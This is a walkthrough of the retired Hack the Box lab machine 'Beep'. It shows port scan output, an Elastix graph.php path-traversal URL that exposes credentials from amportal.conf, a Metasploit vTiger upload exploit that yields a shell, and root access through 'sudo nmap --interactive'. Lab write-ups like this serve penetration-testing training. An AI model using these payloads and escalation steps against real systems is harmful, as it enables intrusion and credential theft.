Hack the Box – Beep Walkthrough

Today we’re going to solve another CTF machine “Beep. It is now a retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services:  22,25,80,110,111,143,443,993,995,3306,4445,10000
  • IP Address: 10.10.10.7
  • Difficulty: Medium

Weakness

  • LFI vulnerablity
  • Sudo NOPASSWD

Contents

  • Getting user
  • Getting root

 


 

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host        port   proto  name       state  info
----        ----   -----  ----       -----  ----
10.10.10.7  22     tcp    ssh        open   OpenSSH 4.3 protocol 2.0
10.10.10.7  25     tcp    smtp       open   Postfix smtpd
10.10.10.7  80     tcp    http       open   Apache httpd 2.2.3
10.10.10.7  110    tcp    pop3       open   Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  111    tcp    rpcbind    open   2 RPC #100000
10.10.10.7  143    tcp    imap       open   Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  443    tcp    ssl/http   open   Apache httpd 2.2.3 (CentOS)
10.10.10.7  993    tcp    ssl/imap   open   Cyrus imapd
10.10.10.7  995    tcp    pop3       open   Cyrus pop3d
10.10.10.7  3306   tcp    mysql      open   MySQL unauthorized
10.10.10.7  4445   tcp    upnotifyp  open   
10.10.10.7  10000  tcp    http       open   MiniServ 1.570 Webmin httpd

We have a quite long list of services. HTTP is running so this is our primary target now.

Enumerate Directories

We a huge list of directories because there’s a Elastix CMS installed on Apache.

Let’s searchsploit elastix,

To read

searchsploit -x php/webapps/37637.pl

To copy exploit to current directory

searchsploit -m php/webapps/37637.pl .

Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
    URL: https://www.exploit-db.com/exploits/37637/
   Path: /usr/share/exploitdb/platforms/php/webapps/37637.pl

Copied to: /root/Documents/hackthebox/10.10.10.7/37637.pl

The proof of concept is extremely simple. Browsing to https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf% 00&module=Accounts&action will expose the credentials for AMPortal.

The box is vulnerable to password reuse, and it is possible to SSH in directly as the root user with the AMPDBPASS password.


Method 2

There’s another method to hack this box. Let’s start over again.

Port Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host        port   proto  name       state  info
----        ----   -----  ----       -----  ----
10.10.10.7  22     tcp    ssh        open   OpenSSH 4.3 protocol 2.0
10.10.10.7  25     tcp    smtp       open   Postfix smtpd
10.10.10.7  80     tcp    http       open   Apache httpd 2.2.3
10.10.10.7  110    tcp    pop3       open   Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  111    tcp    rpcbind    open   2 RPC #100000
10.10.10.7  143    tcp    imap       open   Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  443    tcp    ssl/http   open   Apache httpd 2.2.3 (CentOS)
10.10.10.7  993    tcp    ssl/imap   open   Cyrus imapd
10.10.10.7  995    tcp    pop3       open   Cyrus pop3d
10.10.10.7  3306   tcp    mysql      open   MySQL unauthorized
10.10.10.7  4445   tcp    upnotifyp  open   
10.10.10.7  10000  tcp    http       open   MiniServ 1.570 Webmin httpd

We have a quite long list of services. HTTP is running so this is our primary target now.

Enumerate Directories

We a huge list of directories because there’s a Elastix CMS installed on Apache.

We have a login field either we can brute force or find an SQL injection vulnerability i tested both but unable to find them.

Let’s dig more into directories and see if we can find anything.

https://10.10.10.7/vtigercrm/

We can see another login portal for vtiger CRM 5.1.0 🙂 The first thing we should do is searchsploit vtiger.

So we found some metasploit modules as well let’s test them first to save our time.

msf > search vtiger

Matching Modules
================

   Name                                   Disclosure Date  Rank       Description
   ----                                   ---------------  ----       -----------
   exploit/multi/http/vtiger_install_rce  2014-03-05       manual     Vtiger Install Unauthenticated Remote Command Execution
   exploit/multi/http/vtiger_php_exec     2013-10-30       excellent  vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution
   exploit/multi/http/vtiger_soap_upload  2013-03-26       excellent  vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload

We found our exploit let’s use it.

use exploit/multi/http/vtiger_soap_upload

After executing exploit we got an error let’s take a look at.

If you remember we have an SSL installed on server as well and this exploit also have an option to support SSL. Let’s enable it.

msf exploit(vtiger_soap_upload) > set SSL true
msf exploit(vtiger_soap_upload) > set RPORT 443

After executing we got an shell 🙂

Inside /home/fanis directory we have found our user.txt flag.

Privilege Escalation 

It’s time to get root.txt now we can use privilege escalation scripts to gather information or we can do some research manually first to save our time.

If you do sudo -l you can see many NOPASSWD commands which can lead us to getting root.

sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

There’s nmap and if you google nmap privilege escalation you can find this command 🙂

sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -la
total 16308
drwxr-x---  2 root root     4096 Apr  7  2017 .
drwxr-xr-x 22 root root     4096 Dec  2 23:23 ..
-rw-------  1 root root     1130 Dec  4 13:06 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-rw-------  1 root root     6025 Apr  7  2017 anaconda-ks.cfg
-r-xr-xr-x  1 root root   190461 Aug 10  2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r--  1 root root    18433 Apr  7  2017 install.log
-rw-r--r--  1 root root        0 Apr  7  2017 install.log.syslog
-rw-r--r--  1 root root        1 Apr  7  2017 postnochroot
-rw-------  1 root root       33 Apr  7  2017 root.txt
-r-xr-xr-x  1 root root 16358730 Oct 31  2011 webmin-1.570-1.noarch.rpm
Back to top button
Close